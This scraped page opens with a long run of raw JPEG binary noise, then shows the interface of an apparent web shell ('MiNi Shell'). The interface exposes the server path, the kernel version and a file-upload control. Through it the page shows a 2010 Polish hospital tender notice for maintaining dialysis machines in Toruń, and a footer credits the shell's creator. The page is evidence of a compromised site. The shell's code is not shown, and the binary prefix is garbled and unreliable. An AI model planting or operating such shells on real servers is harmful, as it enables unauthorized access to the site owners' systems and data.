JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100818/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100818/255628-N-2010.html

<p class="kh_header"><b>Toruń: Świadczenie usług serwisowych w zakresie konserwacji i naprawy sprzętu 
i aparatury dializacyjnej eksploatowanej w Stacji Dializ Wojewódzkiego Szpitala Zespolonego im. L. Rydygiera w Toruniu i Wojewódzkiego Szpitala Dziecięcego w Toruniu.</b><br>
<b>Numer ogłoszenia: 255628 - 2010; data zamieszczenia: 18.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53/59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6101510, faks 056 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bielany.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług serwisowych w zakresie konserwacji i naprawy sprzętu 
i aparatury dializacyjnej eksploatowanej w Stacji Dializ Wojewódzkiego Szpitala Zespolonego im. L. Rydygiera w Toruniu i Wojewódzkiego Szpitala Dziecięcego w Toruniu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest świadczenie usług serwisowych w zakresie konserwacji i naprawy sprzętu i aparatury dializacyjnej eksploatowanej w Stacji Dializ Wojewódzkiego Szpitala Zespolonego im. L. Rydygiera w Toruniu i Wojewódzkiego Szpitala Dziecięcego w Toruniu.<br>
I.1. Szczegółowy wykaz sprzętu i aparatury dializacyjnej podlegającej naprawie i konserwacji na Stacji Dializ Wojewódzkiego Szpitala Zespolonego im. L. Rydygiera w Toruniu określa Załącznik Nr 2/1 do SIWZ.<br>
I.2. Szczegółowy wykaz sprzętu i aparatury dializacyjnej podlegającej naprawie i konserwacji na Stacji Dializ Wojewódzkiego Szpitala Dziecięcego w Toruniu określa Załącznik Nr 2/2 do SIWZ.<br>
Wykaz aparatury dializacyjnej podlegającej konserwacji i naprawie znajdującej się na terenie Stacji Dializ Wojewódzkiego Szpitala Zespolonego w Toruniu:<br>
1. Aparat do hemodializy, Fresenius 4008 B, 0V5A/450;<br>
2. Aparat do hemodializy, Fresenius 4008 B, 0V5AL067;<br>
3. Aparat do hemodializy, Fresenius 4008 S, 1VCA7932;<br>
4. Aparat do hemodializy, Fresenius 4008 S, 4VCAT320;<br>
5. Aparat do hemodializy, Fresenius 4008 B, 0V5AN788;<br>
6. Aparat do hemodializy, Fresenius 4008 B, 8V5AC612;<br>
7. Aparat do hemodializy, Fresenius 4008 B, 8V5AC606;<br>
8. Aparat do hemodializy, Gambro AK 95, 3677;<br>
9. Aparat do hemodializy, Gambro AK 95, 5481;<br>
10. Aparat do hemodializy, Fresenius 4008B, 6V5AEE01;<br>    
11. Aparat do hemodializy, Fresenius 4008B, 6V5AED99;<br>
12. Aparat do hemodializy, Fresenius 4008B, 6V5AEE05;<br>
13. Aparat do hemodializy, Fresenius 4008B, 6V5AEE06;<br>
14. Aparat do hemodializy, Fresenius 4008B, 6V5AEE04;<br>
15. Aparat do hemodializy, Fresenius 4008B, 6V5AEE07;<br>
16. Aparat do hemodializy, Fresenius 4008B, 6V5AEE00;<br>
17. Aparat do hemodializy, Fresenius 4008B, 6V5AED98;<br>
18. Aparat do hemodializy, Fresenius 4008 S, 5VCAAV23;<br>
19. Aparat do hemodializy, Fresenius 5008, 6VEA2596;<br>
20. Stacja uzdatniania wody, AQUA B, 647S0142.<br>
Wykaz aparatury dializacyjnej podlegającej konserwacji i naprawie znajdującej się na terenie Stacji Dializ Wojewódzkiego Szpitala Dziecięcego w Toruniu:<br>
1. Aparat do hemodializy, Fresenius 4008 S, 4VCAU782;<br>
2. Aparat do hemodializy, Fresenius 4008 S, 5VCAAJ67;<br>
3. Aparat do hemodializy, Fresenius 4008 S, 5VCAAJ86;<br>
4. Aparat do hemodializy, Fresenius 4008 S, 5VCAAJ85;<br>
5. Aparat do hemodializy, Fresenius 4008 S, 5VCAAJ77;<br>
6. Aparat do hemodializy, Fresenius 4008 S, 5VCAAJ84;<br>
7. Aparat do hemodializy, Fresenius 4008 S, 6VCAEM61;<br>
8. Aparat do hemodializy, Fresenius 4008S, 6VCAEM56;<br> 
9. Aparat do hemodializy, Fresenius 4008S, 5VCAAK06;<br>
10. Aparat do hemodializy, Fresenius 4008S, 6VCAEM53;<br>
11. Aparat do hemodializy, Gambro AK200S, 11753;<br>
12. Aparat PRISMA, Gambro, 962844;<br>
13. Uzdatniacz wody,Gambro CWP 100, 1292.<br>
II. Wykonawca zobowiązany będzie do wykonywania w zakresie urządzeń wyszczególnionych w Załączniku Nr 2/1 pozycje od 1 do 19 oraz w Załączniku Nr 2/2 do SIWZ pozycje od 1 do 12:<br>
- bieżącego nadzoru nad pracą aparatów,
- bieżącej konserwacji,  
- okresowych dezynfekcji (poza codziennymi wykonywanymi przez personel medyczny),
- napraw sprzętu wraz z wymianą części zużywalnych i zamiennych (części zużywalne i zamienne kupuje na wniosek Wykonawcy Zamawiający), 
- diagnozowania awarii i wnioskowanie o dokonanie dużych napraw przez firmy serwisujące,
- wnioskowania o wykonanie obowiązkowych przeglądów rocznych i dwuletnich,
- prowadzenia dokumentacji czynności konserwacyjnych oraz paszportów aparatury dializacyjnej.<br>
II.1 Wykonawca zobowiązany będzie do wykonywania w zakresie urządzenia wyszczególnionego w pozycji 20 Załącznika Nr 2/1 oraz pozycji 13 Załącznika Nr 2/2 do SIWZ:<br>
- codziennych czynności konserwacyjnych,
- codziennych kontroli bieżących parametrów uzdatniacza wody,
- okresowych dezynfekcji i dekalcyfikacji systemu uzdatniania i dystrybucji wody (środki dezynfekcyjne oraz do regeneracji uzdatniacza wody zakupuje na Wniosek Wykonawcy Zamawiający),
- diagnozowania awarii i wnioskowania o dokonanie dużych napraw przez firmy serwisujące,
- wnioskowania o wykonanie obowiązkowych przeglądów rocznych oraz koniecznych wymian złóż przez firmy serwisujące, 
- wnioskowania o wykonanie okresowych, obowiązkowych bakteriologicznych i fizykochemicznych badań wody przez firmy specjalistyczne,
- prowadzenia dokumentacji: czynności konserwacyjnych, badań wody oraz paszportu stacji uzdatniania wody wraz z linią dystrybucji.<br>
III. Wykonawca do napraw będzie używał własnych narzędzi i urządzeń pomiarowych.<br>
IV. Wykonawca zobowiązany będzie do usuwania awarii aparatów wyszczególnionych w Załączniku Nr 2/1 oraz w Załączniku Nr 2/2 w trybie natychmiastowym od chwili zgłoszenia awarii przez Użytkownika.<br>
V. Wykonawca zapewni możliwość zgłoszenia awarii poprzez podanie Zamawiającemu numeru telefonu, na który można będzie dzwonić w celu zgłaszania awarii.<br>
VI. Wykonawca zobowiązany będzie do prowadzenia dokumentacji dotyczącej wykonanych napraw i remontów sprzętu i aparatury.<br>
VII. Zamawiający za świadczenie usług serwisowych będzie płacił Wykonawcy miesięczny ryczałt zgodnie z podanym w ofercie.<br>
VIII. Wykonawca będzie zobowiązany do zatrudnienia na stanowisko konserwatora obecnego pracownika Stacji Dializ Wojewódzkiego Szpitala Dziecięcego w Toruniu na podstawie art. 23.1 Kodeksu Pracy, którego wynagrodzenie miesięczne na dzień wszczęcia postępowania wynosi 2.360,00 zł brutto..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających w okresie 3 lat od udzielenia zamówienia podstawowego, polegających na świadczeniu usług serwisowych w zakresie konserwacji i naprawy w przypadku zwiększenia ilości aparatów do hemodializ eksploatowanych w Stacji Dializ Wojewódzkiego Szpitala Zespolonego w Toruniu i Wojewódzkiego Szpitala Dziecięcego w Toruniu stanowiących nie więcej niż 50% wartości umowy.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ certyfikaty lub świadectwa uprawniające Wykonawcę do serwisowania i naprawy aparatury i sprzętu medycznego wyszczególnionego w załącznikach Nr 2/1 i Nr 2/2 do SIWZ.<br>
b/ świadectwo kwalifikacyjne uprawniające Wykonawcę do zajmowania się eksploatacją urządzeń, instalacji i sieci elektroenergetycznych wytwarzających, przesyłających i zużywających energię elektryczną (urządzenia, instalacje i sieci elektroenergetyczne o napięciu nie wyższym niż 1 kV).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ wykazu wykonanych jak również wykonywanych min. 2 usług w zakresie konserwacji i napraw aparatury medycznej o wartości min. 100.000,00 zł brutto każda usługa w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem wartości, przedmiotu, daty wykonania i odbiorcy oraz załączenia min. 2 dokumentów potwierdzających, że te usługi zostały wykonane należycie;<br>
Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku udziału dotyczącego dysponowania odpowiednim potencjałem technicznym Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ oświadczenie, że Wykonawca świadczył będzie usługi osobami posiadającymi uprawnienia do serwisowania i naprawy sprzętu medycznego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do minimalnej kwoty 50.000,00 zł wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;<br>
/Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku udziału/.<br>
Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br>
Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.<br>
b/ opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o minimalnej sumie gwarancyjnej 100.000,00 zł.<br>
Z przedstawionej w ofercie polisy musi jednoznacznie wynikać, że została ona opłacona.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a/ oświadczenia o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.<br>
b/ oświadczenia o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia publicznego w oparciu o art. 24 ust. 1 pkt 2 ustawy - Prawo zamówień publicznych zgodnie z załącznikiem Nr 8 do SIWZ.<br>
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonego przez Zamawiającego warunku.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Cena ryczałtowa podana w ofercie obowiązywać będzie przez okres trwania umowy, za wyjątkiem zmiany ceny brutto w przypadku zmiany urzędowej stawki podatku VAT. Zmiana stawki podatku VAT musi być udokumentowana przez Wykonawcę.<br>
Wniosek o zmianę Wykonawca składa do Zamawiającego w formie pisemnej. Zmiana ceny obowiązywać będzie od dnia zawarcia aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bielany.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera ul. Św. Józefa  53/59, 87- 100 Toruń - pokój nr 2..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2010 godzina 09:30, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawca na żądanie Zamawiającego i w zakresie przez niego wskazanym jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert spełnianie warunków, o których mowa w art. 22 ust. 1, i brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1.<br>
W wyniku rozstrzygnięcia niniejszego postępowania zostaną zawarte oddzielne umowy tj. umowa na świadczenie usług dla Wojewódzkiego Szpitala Zespolonego im. L. Rydygiera w Toruniu i Wojewódzkiego Szpitala Dziecięcego w Toruniu..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com